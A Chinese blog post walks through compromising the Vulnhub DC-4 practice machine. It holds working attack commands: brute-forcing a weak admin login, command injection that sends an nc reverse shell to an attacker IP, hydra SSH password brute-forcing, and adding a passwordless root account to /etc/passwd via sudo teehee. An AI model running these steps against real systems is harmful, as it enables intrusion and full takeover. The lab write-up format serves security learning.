Vulnhub渗透测试靶机DC-4

最新推荐文章于 2023-11-27 15:12:36 发布
最新推荐文章于 2023-11-27 15:12:36 发布
阅读量432 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46128614/article/details/104037360
版权

下载地址:https://www.vulnhub.com/entry/dc-4,313/

nmap没有扫描到什么有用端口
直接访问80端口
在这里插入图片描述
只有一个认证框 没有验证 bp爆破admin弱密码
发现密码admin qwert
进入后台 发现有执行命令的地方
在这里插入图片描述
抓包发现命令由post包传过去
在这里插入图片描述
执行的命令由客户端传到了服务端
命令执行获取shell
把nc -e /bin/sh 192.168.49.129 4444传上去
在这里插入图片描述
nc –e /bin/sh 192.168.49.129 4444
然后回到kali 监听4444
nc –lvnp 4444
在这里插入图片描述
成功返回一个www用户的shell
然后在/home/jim发现了一个备份文件
在这里插入图片描述
里面存了密码在这里插入图片描述
去爆破jim 用户的ssh
hydra –l jim –P jimpw.txt 192.168.49.10 ssh
在这里插入图片描述
连进jim
ssh jim@192.168.49.10
jibril04
发现jim的home里有一封邮件
在这里插入图片描述
联想到去看看/etc/mail
发现了另一封邮件
在这里插入图片描述
这是charles的密码 直接登录ssh
发现Charles可以执行一条root命令
在这里插入图片描述
查看发现teehee可以插入标准化数据
在这里插入图片描述
那就在/etc/passwd插一个root用户
echo “aaa::0:0:::/bin/bash” |sudo teehee –a /etc/passwd
然后讲道理 就可以直接su aaa了
Charles su了半天没给进
在这里插入图片描述
转换到jim在这里插入图片描述
一下就进去了 玄学吧
在这里插入图片描述
欢迎师傅们指点

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 2942
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
vulnhub_内网渗透测试的记录——网络安全
yz_weixiao的博客
01-03 451
这个靶机花了我大半天的时间,主要还是在网络配置上面的捯饬,内网的靶机每一个都不太难,重要的就是如何通过流量转发后正确的使用一些工具达到扫描端口爆破服务的目的,总体的收获还是挺大的,虽然和真实环境相比确实差别较大,但刚好最近就在用ES这方面的产品,也趁着这个机会对于ES的相关漏洞也加强了学习。
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 303
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4395
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
靶机DC-1 WP
m0_66638011的博客
05-11 1260
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub_CTF-4
weixin_44193247的博客
12-02 870
Vulnhub_CTF-4
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1895
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
DC系列靶机DC-1
weixin_53067829的博客
07-01 938
DC系列靶机
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1713
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub-DOLI: 1渗透
最新发布
laoyanCZ的博客
11-27 1690
点我直接下载靶机
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1006
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2363
Vulnhub-DC-4靶机实战
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub
Bossfrank的博客
06-19 1427
本文对vulnhub靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
VulnHub————CTF4
m0_63200360的博客
09-24 166
本人为新手,发文章只是记录学习笔记,大佬勿喷。文中很多地方有多种解法,并不唯一。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值